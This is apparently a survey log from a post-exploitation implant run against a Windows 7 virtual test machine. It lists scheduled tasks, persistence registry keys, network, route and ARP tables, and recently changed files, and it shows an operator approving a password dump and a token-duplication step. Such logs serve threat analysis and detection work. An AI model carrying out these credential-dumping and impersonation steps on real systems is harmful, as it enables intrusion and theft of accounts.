  593. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate |
  594. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery |
  595. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery |
  596. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 |
  597. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 |
  598. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
  599. | SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
  600. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
  601. | SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
  602. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch |
  603. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot |
  604. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
  605. | SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
  606. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath |
  607. | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector |
  608. | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector |
  609. | SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart |
  610. | SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove |
  611. | SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService |
  612. | SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo |
  613. | SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem |
  614. | SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask |
  615. | SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager |
  616. | SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup |
  617. | SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask |
  618. | SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager |
  619. | SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive |
  620. | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 |
  621. | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 |
  622. | SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor |
  623. | SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime |
  624. | SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig |
  625. | SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost |
  626. | SERVICE | %%%%SystemRoot%%%%\system32\Wat\WatAdminSvc.exe /run (runs in "") | DAILY 2017-07-24T21:30:29Z | DAILY 2017-07-24T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTask |
  627. | SERVICE | %%%%SystemRoot%%%%\system32\schtasks.exe /run /I /TN "\Microsoft\Windows\Windows Activation Technologies\ValidationTask" (runs in "") | DAILY 2017-08-03T21:30:29Z | DAILY 2017-08-03T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTaskDeadline |
  628. | SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting |
  629. | SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange |
  630. | SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary |
  631. | SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2013-10-30T10:00:00 | DAILY 2013-10-30T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification |
  632. | SERVICE | COM job ClassID and data: {0358B920-0AC7-461F-98F4-58E32CD89148} - | LOGON | LOGON | LEAST | Wininet\CacheTask |
  633. | SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan |
  634.  
- [2017-04-28 09:49:57 z0.0.0.11] =============================== Persistence checks ===============================================================
- | Path/Key | File/Value | Data |
- +------------------------------------------------------------+---------------+------------------------------------------+
- | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll |
- | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | |
- | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe |
- | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, |
- | Software\Microsoft\Windows\CurrentVersion\Run | VBoxTray | C:\Windows\system32\VBoxTray.exe |
- [2017-04-28 09:50:08 z0.0.0.11] Saved safety handlers for future op(s)

- [2017-04-28 09:50:09 z0.0.0.11] ================================== Password dump ==================================================================
- [2017-04-28 09:50:09 z0.0.0.11] 1 safety handler registered for passworddump
I think it's safe to run passworddump. Do you want to run it?
YES

- [2017-04-28 09:50:23 z0.0.0.11] ================================= OS information =================================================================
- [2017-04-28 09:50:26 z0.0.0.11] Data age: 02 seconds - data is fresh

- OS installed on Wed Oct 23 09:22:44 2013
- System language settings
Locale: English (USA)
Installed: English (USA)
UI: English (USA)
OS: English (USA)
- System version information
Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1

- [2017-04-28 09:50:27 z0.0.0.11] ============================= Networking Information =============================================================

FQDN: IE11Win7
DNS Servers: 192.168.1.1
- [2017-04-28 09:50:27 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
| Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
+--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
| Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |

- ------------------------------------------------------------------- Route table -------------------------------------------------------------------
- [2017-04-28 09:50:28 z0.0.0.11] Data age: 01 seconds - data is fresh
| Dest. network | Mask | Gateway | Interface | Metric | Origin |
+----------------------------------------+-----------------+---------------------------+--------------+--------+-----------+
| 0.0.0.0 | 0.0.0.0 | 192.168.1.1 | 192.168.1.58 | 10 | MANUAL |
| 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 192.168.1.0 | 255.255.255.0 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
| 192.168.1.58 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
| 192.168.1.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
| 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN |
| 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.1.58 | 266 | WELLKNOWN |
| 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
| :: | 0 | fe80::267f:20ff:fecc:26ba | 192.168.1.58 | 266 | ROUTER_AD |
| ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL |
| 2001:: | 32 | :: | | 8 | ROUTER_AD |
| 2001:0:9d38:953c:18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
| 2600:6c55:4000:1bb:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
| 2600:6c55:4000:1bb:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
| 2600:6c55:4000:1bb:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
| 2600:6c55:4080:3b:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
| 2600:6c55:4080:3b:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
| 2600:6c55:4080:3b:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
| fe80:: | 64 | :: | 192.168.1.58 | 266 | MANUAL |
| fe80:: | 64 | :: | | 256 | MANUAL |
| fe80::5efe:c0a8:13a | 128 | :: | | 256 | MANUAL |
| fe80::18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
| fe80::64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
| ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN |
| ff00:: | 8 | :: | | 256 | WELLKNOWN |
| ff00:: | 8 | :: | 192.168.1.58 | 266 | WELLKNOWN |

- -------------------------------------------------------------------- ARP table --------------------------------------------------------------------
- [2017-04-28 09:50:30 z0.0.0.11] Data age: 01 seconds - data is fresh
| IP | Type | Interface | MAC |
+---------------------------+------+--------------+-------------------------------------------+
| 224.0.0.22 | | 127.0.0.1 | |
| 239.255.255.250 | | 127.0.0.1 | |
| 192.168.1.1 | | 192.168.1.58 | 24-7F-20-CC-26-BA |
| 192.168.1.3 | | 192.168.1.58 | BC-85-56-D3-56-BB |
| 192.168.1.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
| 224.0.0.22 | | 192.168.1.58 | 01-00-5E-00-00-16 |
| 224.0.0.252 | | 192.168.1.58 | 01-00-5E-00-00-FC |
| 239.255.255.250 | | 192.168.1.58 | 01-00-5E-7F-FF-FA |
| 255.255.255.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
| ff02::c | | 127.0.0.1 | |
| ff02::16 | | 127.0.0.1 | |
| ff02::1:2 | | 127.0.0.1 | |
| ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| fe80::267f:20ff:fecc:26ba | | 192.168.1.58 | 24-7F-20-CC-26-BA |
| fe80::e185:cac2:2cba:6d90 | | 192.168.1.58 | BC-85-56-D3-56-BB |
| ff02::1 | | 192.168.1.58 | 33-33-00-00-00-01 |
| ff02::2 | | 192.168.1.58 | 33-33-00-00-00-02 |
| ff02::c | | 192.168.1.58 | 33-33-00-00-00-0C |
| ff02::16 | | 192.168.1.58 | 33-33-00-00-00-16 |
| ff02::1:2 | | 192.168.1.58 | 33-33-00-01-00-02 |
| ff02::1:3 | | 192.168.1.58 | 33-33-00-01-00-03 |
| ff02::1:ff08:9c72 | | 192.168.1.58 | 33-33-FF-08-9C-72 |
| ff02::1:ff4b:26f3 | | 192.168.1.58 | 33-33-FF-4B-26-F3 |
| ff02::1:ffba:6d90 | | 192.168.1.58 | 33-33-FF-BA-6D-90 |
| ff02::1:ffcc:26ba | | 192.168.1.58 | 33-33-FF-CC-26-BA |

- ----------------------------------------------------- Getting the pipelist in the background -----------------------------------------------------

- --------------------------------------------------------------------- NETBIOS ---------------------------------------------------------------------
Running command 'netbios '
---------------------------------------------------------------------
IE11WIN7 UNIQUE REGISTERED Workstation Service
WORKGROUP GROUP REGISTERED Domain Name
IE11WIN7 UNIQUE REGISTERED File Server Service
WORKGROUP GROUP REGISTERED Browser Service Elections

Adapter Address: 08.00.27.61.eb.58
Adapter Type : Ethernet Adapter


Command completed successfully
Do you want to run background netmap -minimal?
YES
- Netmap will require user credentials (and probably won't work on 2K8)
- If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me
Do you want to do this?
YES
Please enter the user handle you were given by duplicatetoken or logonasuser I should use (i.e. proc1234)
IEUser
- [2017-04-28 09:51:49 z0.0.0.11] 1 safety handler registered for netmap

- [2017-04-28 09:51:51 z0.0.0.11] ============================ Memory usage information ============================================================
- [2017-04-28 09:51:51 z0.0.0.11] 1 safety handler registered for memory
- [2017-04-28 09:51:52 z0.0.0.11] Data age: 01 seconds - data is fresh
- Memory Load : 35%%
- Physical Available: 659 M
- Physical Total : 1023 M

- [2017-04-28 09:51:53 z0.0.0.11] ============================ Disk list and space info ============================================================
- [2017-04-28 09:51:56 z0.0.0.11] Data age: 01 seconds - data is fresh
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+-------------------+-------------+
| C | e0ce-337d | Fixed | 9859/129943 (7%%) | 0 |

- [2017-04-28 09:51:57 z0.0.0.11] ================================= USB survey info =================================================================
- [2017-04-28 09:51:58 z0.0.0.11] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:00:01.259000 old, was not re-run
- [2017-04-28 09:51:59 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USB data is only 0:00:01.094000 old, was not re-run
- [2017-04-28 09:52:00 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USBSTOR not found
- [2017-04-28 09:52:00 z0.0.0.11] Showing recent USB devices
[2017-04-28 16:32:32] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&394c0ad3&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
[2014-11-26 19:47:05] ##?#IDE#DiskVirtual_HD______________________________1.1.0___#5&35dc7040&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
[2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- [2017-04-28 09:52:03 z0.0.0.11] User info started in the background as command ID 506.
- [2017-04-28 09:52:03 z0.0.0.11] Extra info to get started in the background as command ID 509.
Running command 'python diffhour.py -args "-safe -sysdrive -recursive"'
- [2017-04-28 09:52:05 z0.0.0.11] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive"
- [2017-04-28 09:52:05 z0.0.0.11] Running dir -path C: -after "2017-04-28 15:52:06" -mask "*" -recursive -before "2017-04-28 16:52:06"
| Modtime | Size | Path | Name |
+---------------------+------------+-----------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------+
| 2017-04-28 16:32:51 | 1073741824 | C:\ | pagefile.sys |
| 2017-04-28 16:40:08 | <DIR> | C:\ProgramData\Microsoft\RAC | Temp |
| 2017-04-28 16:42:08 | 282624 | C:\ProgramData\Microsoft\RAC\PublishedData | RacWmiDatabase.sdf |
| 2017-04-28 16:42:08 | 544768 | C:\ProgramData\Microsoft\RAC\StateData | RacDatabase.sdf |
| 2017-04-28 16:42:08 | 8 | C:\ProgramData\Microsoft\RAC\StateData | RacMetaData.dat |
| 2017-04-28 16:42:08 | 16412 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiDataBookmarks.dat |
| 2017-04-28 16:42:08 | 163868 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiEventData.dat |
| 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications | Windows |
| 2017-04-28 16:33:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.chk |
| 2017-04-28 16:33:36 | 1048576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.log |
| 2017-04-28 16:33:36 | 8454144 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | tmp.edb |
| 2017-04-28 16:33:36 | 42008576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | Windows.edb |
| 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs | SystemIndex |
| 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.Crwl |
| 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.gthr |
| 2017-04-28 16:36:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer | CiFiles |
| 2017-04-28 16:36:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.ci |
| 2017-04-28 16:36:36 | 4096 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.dir |
| 2017-04-28 16:36:36 | 65536 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.wid |
| 2017-04-28 16:33:45 | 135168 | C:\ProgramData\Microsoft\Windows\DRM | drmstore.hds |
| 2017-04-28 16:35:23 | 0 | C:\ProgramData\Microsoft\Windows Defender | IMpService925A3ACA-C353-458A-AC8D-A7E5EB378092.lock |
| 2017-04-28 16:36:15 | 237282 | C:\ProgramData\Microsoft\Windows Defender\Support | MPLog-07132009-215552.log |
| 2017-04-28 16:46:02 | 786432 | C:\Users\IEUser | NTUSER.DAT |
| 2017-04-28 16:46:02 | 262144 | C:\Users\IEUser | ntuser.dat.LOG1 |
| 2017-04-28 16:33:48 | <DIR> | C:\Users\IEUser\AppData\Local | Temp |
| 2017-04-28 16:46:07 | 524288 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat |
| 2017-04-28 16:46:07 | 246784 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat.LOG1 |
| 2017-04-28 16:35:34 | <DIR> | C:\Users\IEUser\AppData\Local\Microsoft\Windows\WER | ERC |
| 2017-04-28 16:33:48 | 3622686 | C:\Users\IEUser\AppData\Local\Temp | BGInfo.bmp |
| 2017-04-28 16:33:34 | <DIR> | C:\Users\IEUser\AppData\Local\Temp | WPDNSE |
| 2017-04-28 16:32:57 | 67584 | C:\Windows | bootstat.dat |
| 2017-04-28 16:37:20 | <DIR> | C:\Windows | inf |
| 2017-04-28 16:33:00 | 2323 | C:\Windows | setupact.log |
| 2017-04-28 16:37:20 | <DIR> | C:\Windows | System32 |
| 2017-04-28 16:36:14 | <DIR> | C:\Windows | Temp |
| 2017-04-28 16:32:56 | 0 | C:\Windows\debug | PASSWD.LOG |
| 2017-04-28 16:33:25 | 36272 | C:\Windows\debug | wlms.log |
| 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf | WmiApRpl |
| 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf\WmiApRpl | 0009 |
| 2017-04-28 16:37:15 | 3444 | C:\Windows\inf\WmiApRpl | WmiApRpl.h |
| 2017-04-28 16:37:20 | 28590 | C:\Windows\inf\WmiApRpl\0009 | WmiApRpl.ini |
| 2017-04-28 16:35:19 | <DIR> | C:\Windows\Microsoft.NET\Framework | v4.0.30319 |
| 2017-04-28 16:45:32 | 262144 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT |
| 2017-04-28 16:45:32 | 226304 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT.LOG1 |
| 2017-04-28 16:33:18 | <DIR> | C:\Windows\ServiceProfiles\LocalService\AppData | Local |
| 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive0.dat |
| 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive1.dat |
| 2017-04-28 16:33:00 | 16777216 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-FontFace.dat |
| 2017-04-28 16:33:18 | 319424 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-System.dat |
| 2017-04-28 16:45:37 | 262144 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT |
| 2017-04-28 16:45:37 | 226304 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT.LOG1 |
| 2017-04-28 16:33:47 | <DIR> | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0 | Icon Files |
| 2017-04-28 16:33:47 | 5022 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files | fa2fa449-604c-4e69-8c5a-6baa8cee5d09.png |
| 2017-04-28 16:40:18 | 578879488 | C:\Windows\SoftwareDistribution\DataStore | DataStore.edb |
| 2017-04-28 16:35:22 | <DIR> | C:\Windows\SoftwareDistribution\DataStore | Logs |
| 2017-04-28 16:40:18 | 8192 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.chk |
| 2017-04-28 16:40:18 | 1310720 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.log |
| 2017-04-28 16:37:20 | 106316 | C:\Windows\System32 | perfc009.dat |
| 2017-04-28 16:37:20 | 623940 | C:\Windows\System32 | perfh009.dat |
| 2017-04-28 16:37:20 | 726316 | C:\Windows\System32 | PerfStringBackup.INI |
| 2017-04-28 16:33:39 | 8192 | C:\Windows\System32\catroot2 | edb.chk |
| 2017-04-28 16:33:39 | 65536 | C:\Windows\System32\catroot2 | edb.log |
| 2017-04-28 16:33:39 | 1056768 | C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE} | catdb |
| 2017-04-28 16:33:40 | 20193280 | C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} | catdb |
| 2017-04-28 16:45:42 | 262144 | C:\Windows\System32\config | DEFAULT |
| 2017-04-28 16:45:42 | 156672 | C:\Windows\System32\config | DEFAULT.LOG1 |
| 2017-04-28 16:33:18 | 262144 | C:\Windows\System32\config | SAM |
| 2017-04-28 16:33:17 | 21504 | C:\Windows\System32\config | SAM.LOG1 |
| 2017-04-28 16:45:52 | 262144 | C:\Windows\System32\config | SECURITY |
| 2017-04-28 16:45:52 | 21504 | C:\Windows\System32\config | SECURITY.LOG1 |
| 2017-04-28 16:46:42 | 35389440 | C:\Windows\System32\config | SOFTWARE |
| 2017-04-28 16:46:42 | 262144 | C:\Windows\System32\config | SOFTWARE.LOG1 |
| 2017-04-28 16:47:39 | 11010048 | C:\Windows\System32\config | SYSTEM |
| 2017-04-28 16:47:39 | 262144 | C:\Windows\System32\config | SYSTEM.LOG1 |
| 2017-04-28 16:40:20 | <DIR> | C:\Windows\System32\LogFiles | Scm |
| 2017-04-28 16:33:06 | 20 | C:\Windows\System32\LogFiles\Scm | 1ec9510d-a439-4950-9399-b6399edf9ea7 |
| 2017-04-28 16:33:07 | 20 | C:\Windows\System32\LogFiles\Scm | 2c59ecaf-3a27-4640-9f4b-519b05bdd70f |
| 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | 5b184694-64c3-4633-94c5-945b3fa561d6 |
| 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | 93e98122-6bf3-4fdc-aeca-74fad5c96233 |
| 2017-04-28 16:33:20 | 12 | C:\Windows\System32\LogFiles\Scm | 9b75c702-ea13-406a-badb-6c588ee4375b |
| 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | a1cfa52f-06f2-418d-addb-cd6456d66f43 |
| 2017-04-28 16:40:09 | 12 | C:\Windows\System32\LogFiles\Scm | a6394592-54ce-4e93-8d64-1a068f462632 |
| 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | bba67ad0-4ba0-4b44-827b-ff419b70c057 |
| 2017-04-28 16:46:22 | 12 | C:\Windows\System32\LogFiles\Scm | de8699d2-8a05-42f7-8a85-5162af47d26a |
| 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | de8bae53-2809-4f75-85ef-427d364b9b2c |
| 2017-04-28 16:40:20 | 20 | C:\Windows\System32\LogFiles\Scm | def25c67-2829-4507-8c40-4111ae376e45 |
| 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | ea4f6189-e102-41e6-8fbb-5c10fc54a023 |
| 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | f1369a11-e983-4458-b390-712efa1cba44 |
| 2017-04-28 16:33:12 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTDiagLog.etl |
| 2017-04-28 16:32:45 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-Application.etl |
| 2017-04-28 16:33:03 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventlog-Security.etl |
| 2017-04-28 16:33:01 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-System.etl |
| 2017-04-28 16:35:23 | 0 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTMsMpPsSession7.etl |
| 2017-04-28 16:33:16 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTUBPM.etl |
| 2017-04-28 16:40:19 | <DIR> | C:\Windows\System32\Tasks\Microsoft | Windows Defender |
| 2017-04-28 16:40:19 | 3856 | C:\Windows\System32\Tasks\Microsoft\Windows Defender | MP Scheduled Scan |
| 2017-04-28 16:37:20 | <DIR> | C:\Windows\System32\wbem | Performance |
| 2017-04-28 16:33:17 | <DIR> | C:\Windows\System32\wbem | Repository |
| 2017-04-28 16:37:15 | 3444 | C:\Windows\System32\wbem\Performance | WmiApRpl.h |
| 2017-04-28 16:37:20 | 28590 | C:\Windows\System32\wbem\Performance | WmiApRpl.ini |
| 2017-04-28 16:45:46 | 4349952 | C:\Windows\System32\wbem\Repository | INDEX.BTR |
| 2017-04-28 16:38:16 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING2.MAP |
| 2017-04-28 16:45:46 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING3.MAP |
| 2017-04-28 16:45:46 | 15425536 | C:\Windows\System32\wbem\Repository | OBJECTS.DATA |
